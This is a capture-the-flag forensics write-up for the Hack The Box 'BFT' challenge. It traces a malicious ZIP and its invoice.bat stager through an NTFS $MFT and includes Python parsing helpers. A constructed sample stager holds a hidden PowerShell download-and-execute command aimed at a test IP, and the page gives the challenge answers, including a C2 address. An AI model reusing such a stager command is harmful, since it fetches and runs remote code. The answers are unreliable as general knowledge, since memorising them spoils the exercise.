BFT (MFT)
The BFT Sherlock introduces the fundamentals of Master File Table (MFT) analysis as part of Windows forensics. The scenario involves identifying malicious activity by examining an $MFT extracted from a compromised system. The challenge walks through parsing MFT data with MFTECmd, analyzing the output in Timeline Explorer, and inspecting raw MFT records in a hex editor, giving a foundational understanding of filesystem-level forensic analysis on Windows systems.
KEY SKILLS AND OBJECTIVES
Learn how to use MFTECmd to parse Master File Table data.
Utilize TimeLine Explorer to visualize and analyze parsed MFT records.
Understand the structure and significance of MFT entries in forensic investigations.
Use a hex editor to inspect and recover raw file content from the MFT.
Identify suspicious file activity and reconstruct potential attack timelines based on file system metadata.
Simon Stark was targeted by attackers on February 13. He downloaded a ZIP file from a link received in an email. What was the name of the ZIP file he downloaded from the link?
PS C:\> BROWSER > https://app.hackthebox.com/tracks/Intro-to-Blue-Team
https://challenges-cdn.hackthebox.com/sherlocks/very-easy/BFT.zip?u=126831&p=mp&e=1747695726&t=1747688526&h=5d65de8816c05fedd1cb63e7f8895c25717194d442d91dbd6dbeae121d131dda
PS C:\> Invoke-WebRequest -Uri https://www.7-zip.org/a/7z2409-x64.exe -OutFile 7zip.exe
...
* install 7zip if required
PS C:\> GUI > BFT.zip > 7-zip > extract files
...
PS C:\> git clone https://github.com/EricZimmerman/MFTECmd.git
PS C:\> cd c:\Temp\MFTECmd\
PS C:\> dotnet publish -f net9.0 -r win-x64 -p:PublishSingleFile=true --self-contained true -p:IncludeNativeLibrariesForSelfExtract=true
PS C:\> cd c:\Temp\MFTECmd\MFTECmd\bin\Release\net9.0\win-x64\publish
PS C:\> Get-ChildItem
Directory: T:\00.HTB\MFTECmd\MFTECmd\bin\Release\net9.0\win-x64\publish
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/20/2025 9:27 AM 73505112 MFTECmd.exe
-a---- 5/20/2025 9:27 AM 33876 MFTECmd.pdb
PS C:\> Copy-Item T:\00.HTB\MFTECmd\MFTECmd\bin\Release\net9.0\win-x64\Publish\MFTECmd.exe "C:\users\Strife\Downloads\BFT\C\"
PS C:\> cd c:\BFT\C
PS C:\> .\MFTECMD.exe -f 'C:\Users\Strife\Downloads\BFT\C\$MFT' --csv "C:\Users\Strife\Downloads\BFT\C" --csvf mft.csv
* single-quote the path so PowerShell does not expand $MFT as a variable (inside double quotes it would be replaced by an empty string)
PS C:\> BROWSER > https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip
...
TimeLineExplorer > File > Open > mft.csv
Filters
Extension: zip
Stage-20240213T093324Z-001.zip 2024-02-13 16:34:40
KAPE.zip 2024-02-13 16:39:06
Archive.zip 2023-07-07 15:25:20
invoice.zip 2024-02-13 17:25:52
Examine the Zone Identifier contents for the initially downloaded ZIP file. This field reveals the HostUrl from where the file was downloaded, serving as a valuable Indicator of Compromise (IOC) in our investigation/analysis. What is the full Host URL from where this ZIP file was downloaded?
(parse $MFT with MFTECmd and open mft.csv in TimelineExplorer as in the first question)
Filters
Filename: stage
File Name: Stage-20240213T093324Z-001.zip:Zone.Identifier
Extension: .Identifier
Zone Id Contents: [ZoneTransfer] ZoneId=3 HostUrl=https://storage.googleapis.com/drive-bulk-export-anonymous/20240213T093324.039Z/4133399871716478688/a40aecd0-1cf3-4f88-b55a-e188d5c1c04f/1/c277a8b4-afa9-4d34-b8ca-e1eb5e5f983c?authuser
* the archive carries a Mark of the Web: ZoneId=3 is the Internet zone, and the HostUrl points at storage.googleapis.com/drive-bulk-export-anonymous, the endpoint Google Drive uses for bulk exports, so the malicious ZIP was hosted on Google Drive; the full HostUrl is the IOC
What is the full path and name of the malicious file that executed malicious code and connected to a C2 server?
(parse $MFT with MFTECmd and open mft.csv in TimelineExplorer as in the first question)
Filters
Parent Path: stage
Created0x10: 2/13/2024
Parent Path: .\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices
File Name: invoice.bat
Created0x10: 2024-02-13 17:23:16
Created0x30: 2024-02-13 16:38:39
* Identify all potentially suspicious files related to the malicious ZIP by
examining MFT (Master File Table) records. Focus on files with suspicious
extensions (e.g., .exe, .dll, .js, .bat, .vbs) created or modified around
the same time as the ZIP download. These may indicate payloads or execution
artifacts from the ZIP
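The TimelineExplorer filters used in the first three questions (ZIPs and their Zone.Identifier origin, then script or binary files created around the download under the extracted folder) can be scripted over the whole mft.csv. The block below is an added example, not code from the page or from MFTECmd. It assumes MFTECmd's CSV column names (EntryNumber, ParentPath, FileName, Extension, Created0x10, Created0x30, ZoneIdContents; check the header row of your export) and its "yyyy-MM-dd HH:mm:ss.fffffff" timestamp format; the sample rows are constructed, with names and times echoing the page's findings and everything else made up.

```python
"""Added example (not from the page or MFTECmd): triage an MFTECmd CSV export the
way the TimelineExplorer filters above do, but scriptable over a whole image."""
import csv
import io
import re
from datetime import datetime, timedelta

# Extensions worth a second look when they appear right after an archive download.
SUSPICIOUS = {".exe", ".dll", ".js", ".jse", ".bat", ".cmd", ".vbs", ".ps1", ".hta", ".lnk", ".scr"}

def parse_ts(s):
    """MFTECmd writes 'yyyy-MM-dd HH:mm:ss.fffffff'; keep second precision."""
    return datetime.strptime(s[:19], "%Y-%m-%d %H:%M:%S")

def load_rows(csv_text):
    return list(csv.DictReader(io.StringIO(csv_text)))

def host_url(zone_contents):
    """HostUrl from a Zone.Identifier body; MFTECmd flattens the INI text into one cell."""
    m = re.search(r"HostUrl=(\S+)", zone_contents or "")
    return m.group(1) if m else None

def downloaded_archives(rows):
    """Every .zip in the MFT with its 0x10 creation time and Mark-of-the-Web origin,
    oldest first. ZoneId=3 means the file came from the Internet zone."""
    out = []
    for r in rows:
        if r["Extension"].lower().lstrip(".") != "zip":
            continue
        zone = r.get("ZoneIdContents") or ""
        out.append({"name": r["FileName"], "created": parse_ts(r["Created0x10"]),
                    "internet": "ZoneId=3" in zone, "host": host_url(zone)})
    return sorted(out, key=lambda a: a["created"])

def payloads_near(rows, anchor, window=timedelta(hours=1), path_hint=""):
    """Script/binary files created (per 0x10 or 0x30) within `window` after `anchor`,
    optionally restricted to paths containing `path_hint` (e.g. the extracted folder)."""
    hits = []
    for r in rows:
        ext = "." + r["Extension"].lower().lstrip(".")
        if ext not in SUSPICIOUS or path_hint.lower() not in r["ParentPath"].lower():
            continue
        c10, c30 = parse_ts(r["Created0x10"]), parse_ts(r["Created0x30"])
        if any(anchor <= t <= anchor + window for t in (c10, c30)):
            # $STANDARD_INFORMATION created earlier than $FILE_NAME created is the classic timestomping tell.
            hits.append({"path": r["ParentPath"] + "\\" + r["FileName"], "entry": int(r["EntryNumber"]),
                         "created_0x10": c10, "created_0x30": c30, "si_before_fn": c10 < c30})
    return sorted(hits, key=lambda h: h["created_0x30"])

# Constructed sample rows (a subset of MFTECmd's columns): names and times echo the
# page's findings; entry numbers other than 23436, sizes and URLs are made up.
SAMPLE_CSV = r"""EntryNumber,InUse,ParentPath,FileName,Extension,FileSize,Created0x10,Created0x30,ZoneIdContents
21001,True,.\Users\simon.stark\Downloads,Stage-20240213T093324Z-001.zip,.zip,5120,2024-02-13 16:34:40.0000000,2024-02-13 16:34:40.0000000,[ZoneTransfer] ZoneId=3 HostUrl=https://drive.example.invalid/export/Stage
21050,True,.\Users\simon.stark\Downloads,KAPE.zip,.zip,1048576,2024-02-13 16:39:06.0000000,2024-02-13 16:39:06.0000000,[ZoneTransfer] ZoneId=3 HostUrl=https://tools.example.invalid/KAPE.zip
9001,True,.\Users\simon.stark\Documents,Archive.zip,.zip,2048,2023-07-07 15:25:20.0000000,2023-07-07 15:25:20.0000000,
23436,True,.\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices,invoice.bat,.bat,286,2024-02-13 17:23:16.0000000,2024-02-13 16:38:39.0000000,
23437,True,.\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices,invoice.pdf,.pdf,40960,2024-02-13 16:38:39.0000000,2024-02-13 16:38:39.0000000,
1200,True,.\Windows\System32,helper.dll,.dll,70144,2024-02-13 16:40:00.0000000,2024-02-13 16:40:00.0000000,
"""
```

Against a real export, replace SAMPLE_CSV with `open("mft.csv", encoding="utf-8-sig").read()`, take the download time from `downloaded_archives()`, and pass it as `anchor` to `payloads_near()`; the `path_hint` keeps system-wide noise (the constructed helper.dll here) out of the result, and `si_before_fn` flags the rows whose $STANDARD_INFORMATION creation time has been pushed back.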
Analyze the $Created0x30 timestamp for the previously identified file. When was this file created on disk?
(parse $MFT with MFTECmd and open mft.csv in TimelineExplorer as in the first question)
Filters
Parent Path: stage
Created0x10: 2/13/2024
Parent Path: .\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices
File Name: invoice.bat
Created0x10: 2024-02-13 17:23:16
Created0x30: 2024-02-13 16:38:39
* the Created0x10 column comes from the $STANDARD_INFORMATION attribute (type 0x10):
  these are the timestamps Explorer and most tools display, they are updated during
  normal use, and they can be set from user mode (SetFileTime), so they are the ones
  timestomping tools change.
* the Created0x30 column comes from the $FILE_NAME attribute (type 0x30): written by
  the kernel when the record is created and refreshed only when the file is renamed
  or moved, not settable by user-mode code, so it is the more trustworthy "created on
  disk" time and the value this question asks for. A 0x10 creation time earlier than
  the 0x30 one (MFTECmd's SI<FN column) is a classic timestomping indicator.
Finding the hex offset of an MFT record is beneficial in many investigative scenarios. Find the hex offset of the stager file from Question 3.
(parse $MFT with MFTECmd and open mft.csv in TimelineExplorer as in the first question)
Filters
Parent Path: stage
Created0x10: 2/13/2024
Entry Number: 23436
Parent Path: .\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices
File Name: invoice.bat
Created0x10: 2024-02-13 17:23:16
Created0x30: 2024-02-13 16:38:39
TimeLineExplorer
Filename: invoice.bat
Entry Number: 23436
Offset Formula: 1024 * 23436 = 23,998,464
PS C:\> BROWSER > https://www.rapidtables.com/convert/number/decimal-to-hex.html
From: Decimal
To: Hexadecimal
Decimal Number: 23998464
Hexadecimal: 16E3000
* each MFT record is 1024 bytes in size; multiply the entry value by 1024 to get the decimal offset
Each MFT record is 1024 bytes in size. If a file on disk is smaller than 1024 bytes, its content can be stored directly in the MFT record itself. These are called MFT resident files. During a Windows file system investigation, it is crucial to look for any malicious/suspicious files that may be resident in the MFT. This way we can find the contents of malicious files/scripts. Find the contents of the malicious stager identified in Question 3 and answer with the C2 IP and port.
(parse $MFT with MFTECmd and open mft.csv in TimelineExplorer as in the first question)
TimeLineExplorer
Filename: invoice.bat
Entry Number: 23436
File Size: 286
Offset: 1024 * 23436 = 23,998,464 = 0x16E3000 (as computed in Question 5)
* a $DATA attribute is resident when its content fits inside the 1024-byte record
  alongside the record header and the other attributes (roughly 700 bytes or less in
  practice); 286 bytes fits easily, so the full content of invoice.bat can be read
  straight out of the MFT record at that offset.
HexEditor > File > Open > $MFT
HexEditor > Go To > 16E3000
...
http://43.204.110.203:6666
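The hex-editor steps in Questions 4 to 6 (compute the record offset, read the 0x10 and 0x30 creation times, carve the resident $DATA content) can be done programmatically against the raw $MFT. The block below is an added example, not code from the page, MFTECmd or any hex editor. It follows the public NTFS on-disk layout of a FILE record and its resident attributes, including the update-sequence fixups that a hex editor shows in place at the end of each sector. The sample $MFT is constructed: the stager text, the RFC 5737 test IP and the HostUrl are made up, the entry number is small to keep the sample tiny, and only the file name and the two creation timestamps are chosen to match the page's result.

```python
"""Added example (not from the page or MFTECmd): read one NTFS $MFT record by entry number,
undo the update-sequence fixups, walk the attributes, and carve resident $DATA streams."""
import struct
from datetime import datetime, timedelta, timezone

RECORD_SIZE = 1024                      # MFT record size on current NTFS volumes
STANDARD_INFORMATION, FILE_NAME, DATA, END_MARKER = 0x10, 0x30, 0x80, 0xFFFFFFFF
EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def record_offset(entry_number, record_size=RECORD_SIZE):
    """Byte offset of an entry inside $MFT: the value for the hex editor's Go To."""
    return entry_number * record_size

def filetime_to_dt(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return EPOCH + timedelta(microseconds=ft // 10)

def dt_to_filetime(dt):
    d = dt - EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def apply_fixups(rec):
    """On disk the last 2 bytes of every 512-byte sector are overwritten with the update
    sequence number; the original bytes sit in the USA and must be put back before parsing."""
    rec = bytearray(rec)
    usa_off, usa_count = struct.unpack_from("<HH", rec, 0x04)
    usn = rec[usa_off:usa_off + 2]
    for i in range(usa_count - 1):
        end = (i + 1) * 512
        if rec[end - 2:end] != usn:
            raise ValueError("fixup mismatch in sector %d: torn or corrupt record" % i)
        rec[end - 2:end] = rec[usa_off + 2 + 2 * i:usa_off + 4 + 2 * i]
    return bytes(rec)

def parse_record(mft, entry_number):
    """Header facts, both creation times, the name, and resident $DATA streams keyed by
    stream name ('' is the file's own content, 'Zone.Identifier' is the MOTW ADS)."""
    off = record_offset(entry_number)
    rec = mft[off:off + RECORD_SIZE]
    if rec[:4] != b"FILE":
        raise ValueError("no FILE signature at offset 0x%X" % off)
    rec = apply_fixups(rec)
    if struct.unpack_from("<I", rec, 0x2C)[0] != entry_number:
        raise ValueError("record number in header does not match entry %d" % entry_number)
    info = {"offset": off, "in_use": bool(struct.unpack_from("<H", rec, 0x16)[0] & 1), "streams": {}}
    pos = struct.unpack_from("<H", rec, 0x14)[0]          # offset of the first attribute
    while pos + 8 <= RECORD_SIZE:
        atype, alen = struct.unpack_from("<II", rec, pos)
        if atype == END_MARKER or alen == 0:
            break
        nonres, name_len, name_off = struct.unpack_from("<BBH", rec, pos + 8)
        name = rec[pos + name_off:pos + name_off + 2 * name_len].decode("utf-16-le")
        if nonres:                                         # content lives out in clusters, not here
            if atype == DATA:
                info["streams"][name] = None
        else:
            size, coff = struct.unpack_from("<IH", rec, pos + 0x10)
            body = rec[pos + coff:pos + coff + size]
            if atype == STANDARD_INFORMATION:              # Created0x10: settable from user mode
                info["created_0x10"] = filetime_to_dt(struct.unpack_from("<Q", body, 0)[0])
            elif atype == FILE_NAME:                       # Created0x30: kernel-maintained
                info["created_0x30"] = filetime_to_dt(struct.unpack_from("<Q", body, 8)[0])
                info["filename"] = body[0x42:0x42 + 2 * body[0x40]].decode("utf-16-le")
            elif atype == DATA:                            # resident: the file bytes are right here
                info["streams"][name] = body
        pos += alen
    return info

def zone_host_url(zone_bytes):
    """HostUrl= line from a Zone.Identifier stream ([ZoneTransfer] INI text)."""
    for line in zone_bytes.decode("utf-8", "replace").splitlines():
        if line.startswith("HostUrl="):
            return line[len("HostUrl="):]
    return None

# ---- constructed sample $MFT; stager text, URL and IP (RFC 5737 range) are made up ------
STAGER = b'@echo off\r\npowershell -w hidden -c "IEX(IWR http://192.0.2.10:4444/a)"\r\n'
ZONE = b"[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=https://files.example.invalid/export/Stage.zip\r\n"

def _attr(atype, body, name=""):
    """Resident attribute: 24-byte header, optional UTF-16 name, 8-byte-aligned body."""
    nm = name.encode("utf-16-le")
    coff = 0x18 + len(nm) + (-(0x18 + len(nm))) % 8
    total = coff + len(body) + (-(coff + len(body))) % 8
    hdr = struct.pack("<IIBBHHHIHBB", atype, total, 0, len(name), 0x18, 0, 0, len(body), coff, 0, 0)
    return hdr + nm + bytes(coff - 0x18 - len(nm)) + body + bytes(total - coff - len(body))

def build_sample_mft(entry_number=7):
    """$MFT with blank entries before `entry_number`, then one in-use record for invoice.bat."""
    c10 = datetime(2024, 2, 13, 17, 23, 16, tzinfo=timezone.utc)
    c30 = datetime(2024, 2, 13, 16, 38, 39, tzinfo=timezone.utc)
    si = struct.pack("<4Q", *[dt_to_filetime(c10)] * 4) + bytes(0x28)
    fn = struct.pack("<5QQQIIBB", 5, *[dt_to_filetime(c30)] * 4, 0, 0, 0x20, 0, 11, 3) + "invoice.bat".encode("utf-16-le")
    attrs = (_attr(STANDARD_INFORMATION, si) + _attr(FILE_NAME, fn) + _attr(DATA, STAGER)
             + _attr(DATA, ZONE, "Zone.Identifier") + struct.pack("<II", END_MARKER, 0))
    hdr = b"FILE" + struct.pack("<HHQHHHHIIQHHI", 0x30, 3, 0, 1, 1, 0x38, 1, 0x38 + len(attrs), RECORD_SIZE, 0, 4, 0, entry_number)
    rec = bytearray(hdr + b"\x01\x00" + bytes(6) + attrs)  # USN = 1; USA slots are filled below
    rec += bytes(RECORD_SIZE - len(rec))
    for i, end in enumerate((512, 1024)):                  # emulate what the driver writes to disk
        rec[0x32 + 2 * i:0x34 + 2 * i] = rec[end - 2:end]
        rec[end - 2:end] = b"\x01\x00"
    return bytes(entry_number * RECORD_SIZE) + bytes(rec)
```

For the real image, `parse_record(open(r"C:\Users\Strife\Downloads\BFT\C\$MFT", "rb").read(), 23436)["streams"][""]` returns the bytes you would otherwise read by hand at 0x16E3000 (use `mmap` instead of `read()` on large volumes); a `None` in `streams` means the content is non-resident and has to be carved from the data runs instead, and a fixup mismatch means the record copy is torn and the timestamps in it should not be trusted.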